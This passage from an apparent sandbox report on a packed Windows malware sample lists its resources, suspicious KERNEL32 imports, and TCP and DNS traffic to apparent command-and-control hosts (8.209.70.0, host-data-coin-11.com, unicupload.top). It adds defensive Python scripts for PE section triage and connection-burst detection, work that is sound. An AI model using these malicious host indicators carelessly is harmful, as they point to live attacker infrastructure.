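The section table above carries the packer indicators an analyst reads first: a .text section with entropy near 7 bits/byte, a .data section whose virtual size (0x10c988) is about 180 times its raw size (0x1800), which is room reserved for code that is only written after unpacking, and three sections with invented names (.koyalef, .bopi, .cegem). The script below is an added example written for this page; it is not code from the report or from the sample. It parses the IMAGE_SECTION_HEADER array with only the standard library, computes Shannon entropy per section and applies those checks. The thresholds (7.0 bits/byte, a 4x virtual-to-raw ratio) and the list of "standard" section names are heuristics chosen here, not PE rules, and the two-section test image it builds is constructed, not the analysed file.

```python
"""Section-table triage for a PE image, standard library only.

Added example (not code from the report or the sample): parses the
IMAGE_SECTION_HEADER array, computes per-section Shannon entropy and applies
the checks an analyst runs against a section table: non-standard names,
virtual size far larger than raw size (space reserved for unpacked code),
high entropy, and writable+executable sections. Thresholds are heuristics.
"""
import hashlib
import math
import struct

STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".didat"}
SCN_CNT_CODE, SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x00000020, 0x20000000, 0x80000000
HIGH_ENTROPY = 7.0   # heuristic cutoff, bits per byte
VSIZE_RATIO = 4      # flag when VirtualSize > 4 * SizeOfRawData


def shannon_entropy(data):
    """Bits per byte over the raw section bytes (0.0 for an empty section)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image):
    """Walk e_lfanew -> COFF header -> 40-byte section headers; one dict per section."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size                 # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        (chars,) = struct.unpack_from("<I", image, off + 36)
        raw = image[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(raw)})
    return sections


def triage(sections):
    """Return (section name, reason) pairs for every heuristic that fires."""
    findings = []
    for s in sections:
        if s["name"] not in STANDARD_NAMES:
            findings.append((s["name"], "non-standard section name"))
        if s["rawsize"] and s["vsize"] > VSIZE_RATIO * s["rawsize"]:
            findings.append((s["name"], "virtual size far exceeds raw size"))
        if s["entropy"] >= HIGH_ENTROPY:
            findings.append((s["name"], "high entropy"))
        if s["chars"] & SCN_MEM_WRITE and s["chars"] & (SCN_MEM_EXECUTE | SCN_CNT_CODE):
            findings.append((s["name"], "writable and executable"))
    return findings


def build_test_image():
    """Constructed minimal PE32 with two sections; a stand-in, not the analysed sample."""
    text = bytes(range(16)) * 0x40                        # 0x400 bytes, entropy exactly 4.0
    blob = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest()
                    for i in range(64))                    # 0x800 pseudo-random bytes (~7.9 bits/byte)

    def hdr(name, vsize, vaddr, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)

    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic; other fields left zero
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    secs = (hdr(b".text", len(text), 0x1000, len(text), 0x400, 0x60000020)        # CODE|EXEC|READ
            + hdr(b".koyalef", 0x10000, 0x2000, len(blob), 0x800, 0xE0000020))   # CODE|EXEC|READ|WRITE
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))            # e_lfanew
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs
    return headers.ljust(0x400, b"\0") + text + blob


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_image()
    secs = parse_sections(image)
    for s in secs:
        print(f"{s['name']:<9} va=0x{s['vaddr']:x} vsize=0x{s['vsize']:x} "
              f"raw=0x{s['rawsize']:x} entropy={s['entropy']:.2f}")
    for name, reason in triage(secs):
        print(f"  {name}: {reason}")
```

Read the checks together rather than singly: against the values in the table above, .data trips the size check and the three odd names trip the name check, while .text at 6.97 bits/byte sits just under a 7.0 cutoff, so an entropy threshold alone would have missed it. The Data Directories table adds one more corroborating detail: the import directory is 0x28 bytes, and an IMAGE_IMPORT_DESCRIPTOR is 20 bytes, so it holds exactly one descriptor plus the null terminator, matching the single-DLL (KERNEL32.dll) import list further down.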

Resources

Name                 RVA       Size   Type                                                          Language  Country
AFX_DIALOG_LAYOUT    0x156ce8  0x2    data                                                          Dutch     Netherlands
AFX_DIALOG_LAYOUT    0x156ce0  0x2    data                                                          Dutch     Netherlands
AFX_DIALOG_LAYOUT    0x156cf0  0x2    data                                                          Dutch     Netherlands
AFX_DIALOG_LAYOUT    0x156cf8  0x2    data                                                          Dutch     Netherlands
CIDAFICUDUROSOTAROM  0x1565c8  0x6c7  ASCII text, with very long lines, with no line terminators    Spanish   Colombia
RT_CURSOR            0x156d00  0x8a8  dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"  Dutch  Netherlands
RT_ICON              0x1506e0  0x6c8  data                                                          Spanish   Colombia
RT_ICON              0x150da8  0x568  GLS_BINARY_LSB_FIRST                                          Spanish   Colombia
RT_ICON              0x151310  0x10a8 data                                                          Spanish   Colombia
RT_ICON              0x1523b8  0x988  dBase III DBT, version number 0, next free block index 40     Spanish   Colombia
RT_ICON              0x152d40  0x468  GLS_BINARY_LSB_FIRST                                          Spanish   Colombia
RT_ICON              0x1531f8  0x8a8  data                                                          Spanish   Colombia
RT_ICON              0x153aa0  0x6c8  data                                                          Spanish   Colombia
RT_ICON              0x154168  0x568  GLS_BINARY_LSB_FIRST                                          Spanish   Colombia
RT_ICON              0x1546d0  0x10a8 data                                                          Spanish   Colombia
RT_ICON              0x155778  0x988  data                                                          Spanish   Colombia
RT_ICON              0x156100  0x468  GLS_BINARY_LSB_FIRST                                          Spanish   Colombia
RT_STRING            0x1575c0  0xe4   data                                                          Dutch     Netherlands
RT_STRING            0x1576a8  0x3a8  data                                                          Dutch     Netherlands
RT_STRING            0x157a50  0x6e6  data                                                          Dutch     Netherlands
RT_STRING            0x158138  0x1a0  data                                                          Dutch     Netherlands
RT_STRING            0x1582d8  0xdc   data                                                          Dutch     Netherlands
RT_ACCELERATOR       0x156ca0  0x10   data                                                          Dutch     Netherlands
RT_ACCELERATOR       0x156c90  0x10   data                                                          Dutch     Netherlands
RT_GROUP_CURSOR      0x1575a8  0x14   data                                                          Dutch     Netherlands
RT_GROUP_ICON        0x1531a8  0x4c   data                                                          Spanish   Colombia
RT_GROUP_ICON        0x156568  0x5a   data                                                          Spanish   Colombia
None                 0x156cc0  0xa    data                                                          Dutch     Netherlands
None                 0x156cd0  0xa    data                                                          Dutch     Netherlands
None                 0x156cb0  0xa    data                                                          Dutch     Netherlands

Imports

DLL           Import
KERNEL32.dll  CallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthW, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeW, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, GetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, WriteFile, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetDriveTypeA, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, GetConsoleMode, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBA, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW,
              SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetNumberOfConsoleInputEvents, GetModuleHandleW, WriteConsoleOutputCharacterA, HeapFree, OpenMutexW, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetProcessVersion, lstrcpynA, GetNamedPipeInfo, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

Possible Origin

Language of compilation system  Country where language is spoken
Dutch                           Netherlands
Spanish                         Colombia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 14, 2022 09:24:58.797563076 CET  49771        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:58.814989090 CET  80           49771      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:58.815146923 CET  49771        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:58.815263033 CET  49771        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:58.816153049 CET  49771        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:58.832624912 CET  80           49771      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:58.833401918 CET  80           49771      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:58.940293074 CET  80           49771      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:58.940399885 CET  49771        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:58.941262960 CET  49771        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:58.958657980 CET  80           49771      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.284614086 CET  49772        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.302115917 CET  80           49772      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.302324057 CET  49772        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.302438021 CET  49772        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.302463055 CET  49772        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.319987059 CET  80           49772      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.445801020 CET  80           49772      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.445892096 CET  49772        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.445961952 CET  49772        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.463897943 CET  80           49772      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.475713968 CET  49773        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.493649006 CET  80           49773      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.493765116 CET  49773        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.493870974 CET  49773        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.493884087 CET  49773        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.511320114 CET  80           49773      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.614084959 CET  80           49773      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.614232063 CET  49773        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.614471912 CET  49773        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.633616924 CET  80           49773      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.907728910 CET  49774        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.926353931 CET  80           49774      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.930547953 CET  49774        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.930694103 CET  49774        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.932509899 CET  49774        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:24:59.948623896 CET  80           49774      8.209.70.0       192.168.2.4
Jan 14, 2022 09:24:59.949959993 CET  80           49774      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.052834988 CET  80           49774      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.053014040 CET  49774        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.053267002 CET  49774        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.070507050 CET  80           49774      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.082914114 CET  49775        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.100903034 CET  80           49775      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.100996017 CET  49775        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.101351976 CET  49775        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.101387024 CET  49775        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.118777990 CET  80           49775      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.221487999 CET  80           49775      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.224498034 CET  49775        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.250431061 CET  49775        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.268131018 CET  80           49775      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.278577089 CET  49776        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.296108007 CET  80           49776      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.296245098 CET  49776        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.296350956 CET  49776        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.297825098 CET  49776        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.313702106 CET  80           49776      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.315283060 CET  80           49776      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.418025970 CET  80           49776      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.418343067 CET  49776        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.418565035 CET  49776        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:00.426628113 CET  49777        80         192.168.2.4      185.186.142.166
Jan 14, 2022 09:25:00.435934067 CET  80           49776      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:00.483220100 CET  80           49777      185.186.142.166  192.168.2.4
Jan 14, 2022 09:25:00.985346079 CET  49777        80         192.168.2.4      185.186.142.166
Jan 14, 2022 09:25:01.042015076 CET  80           49777      185.186.142.166  192.168.2.4
Jan 14, 2022 09:25:01.547843933 CET  49777        80         192.168.2.4      185.186.142.166
Jan 14, 2022 09:25:01.604538918 CET  80           49777      185.186.142.166  192.168.2.4
Jan 14, 2022 09:25:01.666572094 CET  49778        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.684102058 CET  80           49778      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.684206963 CET  49778        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.684281111 CET  49778        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.684849977 CET  49778        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.701833010 CET  80           49778      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.702070951 CET  80           49778      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.809964895 CET  80           49778      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.810058117 CET  49778        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.810340881 CET  49778        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.828099012 CET  80           49778      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.841980934 CET  49779        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.859357119 CET  80           49779      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.859595060 CET  49779        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.859750986 CET  49779        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.859767914 CET  49779        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.877048969 CET  80           49779      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.877120972 CET  80           49779      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.980530024 CET  80           49779      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:01.980627060 CET  49779        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.980865002 CET  49779        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:01.998287916 CET  80           49779      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:02.298381090 CET  49780        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:02.315738916 CET  80           49780      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:02.315850019 CET  49780        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:02.315969944 CET  49780        80         192.168.2.4      8.209.70.0
Jan 14, 2022 09:25:02.376662016 CET  80           49780      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:02.418742895 CET  80           49780      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:02.418781996 CET  80           49780      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:02.418800116 CET  80           49780      8.209.70.0       192.168.2.4
Jan 14, 2022 09:25:02.418817997 CET  80           49780      8.209.70.0       192.168.2.4
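Read per packet, the TCP list above is hard to judge; read per flow it shows the sample opening ten separate HTTP connections from consecutive ephemeral ports (49771 to 49780) to 8.209.70.0:80 within about four seconds, each lasting under 0.2 s, plus one connection to 185.186.142.166:80. That burst of short-lived connections to one server is the shape a loader produces when it polls its controller or fetches several payloads in a row. The script below is an added example for this page, not code from the report: it groups packet rows into bidirectional flows (the side that sends the first packet is taken as the client) and flags any server endpoint that receives at least three sub-second flows starting within a ten-second window. The embedded rows are the first three flows of the report's table with the columns split by whitespace; the thresholds are heuristics chosen here.

```python
"""Flow-level triage of a sandbox TCP packet list (standard library only).

Added example, not part of the Joe Sandbox report: groups the per-packet rows
of the TCP Packets table into flows and flags a burst of short-lived
connections to one server endpoint. The thresholds are heuristics chosen here.
"""
from collections import defaultdict
from datetime import datetime

# Excerpt of the report's TCP Packets table (flows 49771-49773 only); each row is
# "Mon DD, YYYY HH:MM:SS.nnnnnnnnn TZ src_port dst_port src_ip dst_ip".
SAMPLE_ROWS = """\
Jan 14, 2022 09:24:58.797563076 CET 49771 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:58.814989090 CET 80 49771 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:58.815146923 CET 49771 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:58.815263033 CET 49771 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:58.816153049 CET 49771 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:58.832624912 CET 80 49771 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:58.833401918 CET 80 49771 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:58.940293074 CET 80 49771 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:58.940399885 CET 49771 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:58.941262960 CET 49771 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:58.958657980 CET 80 49771 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.284614086 CET 49772 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.302115917 CET 80 49772 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.302324057 CET 49772 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.302438021 CET 49772 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.302463055 CET 49772 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.319987059 CET 80 49772 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.445801020 CET 80 49772 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.445892096 CET 49772 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.445961952 CET 49772 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.463897943 CET 80 49772 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.475713968 CET 49773 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.493649006 CET 80 49773 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.493765116 CET 49773 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.493870974 CET 49773 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.493884087 CET 49773 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.511320114 CET 80 49773 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.614084959 CET 80 49773 8.209.70.0 192.168.2.4
Jan 14, 2022 09:24:59.614232063 CET 49773 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.614471912 CET 49773 80 192.168.2.4 8.209.70.0
Jan 14, 2022 09:24:59.633616924 CET 80 49773 8.209.70.0 192.168.2.4
"""
EPOCH = datetime(1970, 1, 1)


def parse_timestamp(date_str, clock):
    """'Jan 14, 2022' + 'HH:MM:SS.nnnnnnnnn' -> float seconds; keeps the nanoseconds strptime drops."""
    hms, frac = clock.split(".")
    base = datetime.strptime(f"{date_str} {hms}", "%b %d, %Y %H:%M:%S")
    return (base - EPOCH).total_seconds() + int(frac.ljust(9, "0")[:9]) / 1e9


def parse_rows(text):
    """Return (ts, src_ip, src_port, dst_ip, dst_port) tuples, oldest first."""
    packets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 9:          # header or blank line
            continue
        ts = parse_timestamp(" ".join(parts[:3]), parts[3])
        packets.append((ts, parts[7], int(parts[5]), parts[8], int(parts[6])))
    return sorted(packets)


def build_flows(packets):
    """Group packets into bidirectional flows; the first packet seen names the client."""
    flows = {}
    for ts, sip, sport, dip, dport in packets:
        key = frozenset({(sip, sport), (dip, dport)})
        f = flows.setdefault(key, {"client": (sip, sport), "server": (dip, dport),
                                   "first": ts, "last": ts, "packets": 0})
        f["last"], f["packets"] = ts, f["packets"] + 1
    return list(flows.values())


def find_connection_bursts(flows, min_flows=3, window_s=10.0, max_flow_s=1.0):
    """Servers receiving >= min_flows flows, each at most max_flow_s long, started within window_s."""
    by_server = defaultdict(list)
    for f in flows:
        by_server[f["server"]].append(f)
    findings = []
    for (ip, port), fl in by_server.items():
        fl.sort(key=lambda f: f["first"])
        for i in range(len(fl)):
            group = [g for g in fl[i:] if g["first"] - fl[i]["first"] <= window_s]
            if len(group) >= min_flows and all(g["last"] - g["first"] <= max_flow_s for g in group):
                findings.append({"server": f"{ip}:{port}", "flows": len(group),
                                 "span_s": round(group[-1]["first"] - group[0]["first"], 3),
                                 "longest_flow_s": round(max(g["last"] - g["first"] for g in group), 3)})
                break                # one finding per server is enough
    return findings


if __name__ == "__main__":
    flows = build_flows(parse_rows(SAMPLE_ROWS))
    for f in flows:
        print(f"{f['client'][0]}:{f['client'][1]} -> {f['server'][0]}:{f['server'][1]}  "
              f"{f['packets']} pkts  {f['last'] - f['first']:.3f} s")
    print(find_connection_bursts(flows))
```

Run over the full table rather than the excerpt, the same logic reports ten flows to 8.209.70.0:80 in roughly four seconds and leaves the single 185.186.142.166:80 flow unflagged; that one shows three client packets spaced about 0.5 s apart, each answered once, which the packet list alone cannot classify because the report omits TCP flags and payload sizes. Pair the flow view with the HTTP request list further down in the report before drawing conclusions about what each connection fetched.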

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
Jan 14, 2022 09:24:58.504261971 CET  192.168.2.4  8.8.8.8  0x85fb    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:24:58.950818062 CET  192.168.2.4  8.8.8.8  0x61cb    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:24:59.455101967 CET  192.168.2.4  8.8.8.8  0x35d0    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:24:59.623431921 CET  192.168.2.4  8.8.8.8  0x9b0a    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:00.062973976 CET  192.168.2.4  8.8.8.8  0x5fa1    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:00.258764029 CET  192.168.2.4  8.8.8.8  0xd8c1    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:01.648228884 CET  192.168.2.4  8.8.8.8  0xe4b6    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:01.821270943 CET  192.168.2.4  8.8.8.8  0x8084    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:01.988954067 CET  192.168.2.4  8.8.8.8  0x92df    Standard query (0)  data-host-coin-8.com   A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:04.468344927 CET  192.168.2.4  8.8.8.8  0x133b    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:04.640755892 CET  192.168.2.4  8.8.8.8  0x824a    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:05.106497049 CET  192.168.2.4  8.8.8.8  0x4276    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:05.744245052 CET  192.168.2.4  8.8.8.8  0xe630    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:05.910893917 CET  192.168.2.4  8.8.8.8  0x2f13    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:06.375499964 CET  192.168.2.4  8.8.8.8  0x6231    Standard query (0)  unicupload.top         A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:06.536884069 CET  192.168.2.4  8.8.8.8  0xdf03    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:06.966842890 CET  192.168.2.4  8.8.8.8  0xc429    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:07.441303968 CET  192.168.2.4  8.8.8.8  0x1c71    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
Jan 14, 2022 09:25:07.610197067 CET  192.168.2.4  8.8.8.8  0xdf90    Standard query (0)  host-data-coin-11.com  A (IP address)  IN (0x0001)
